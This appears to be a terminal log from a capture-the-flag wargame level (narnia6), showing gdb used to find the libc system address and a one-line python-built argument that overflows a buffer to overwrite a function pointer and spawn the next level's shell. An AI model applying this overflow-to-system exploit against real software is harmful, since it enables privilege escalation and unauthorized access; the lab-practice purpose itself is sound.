(gdb) p system
No symbol table is loaded.  Use the "file" command.
(gdb) r bla bla
Starting program: /narnia/narnia6 bla bla
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
bla
[Inferior 1 (process 1363062) exited with code 01]
(gdb) p system
$1 = {int (const char *)} 0xf7c48170 <__libc_system>

narnia6@gibson:/narnia$ ./narnia6 $(python3 -c "import sys, struct;sys.stdout.buffer.write(b'bash;'+b'a'*3+struct.pack('<I', 0xf7c48170))") 2
narnia7@gibson:/narnia$
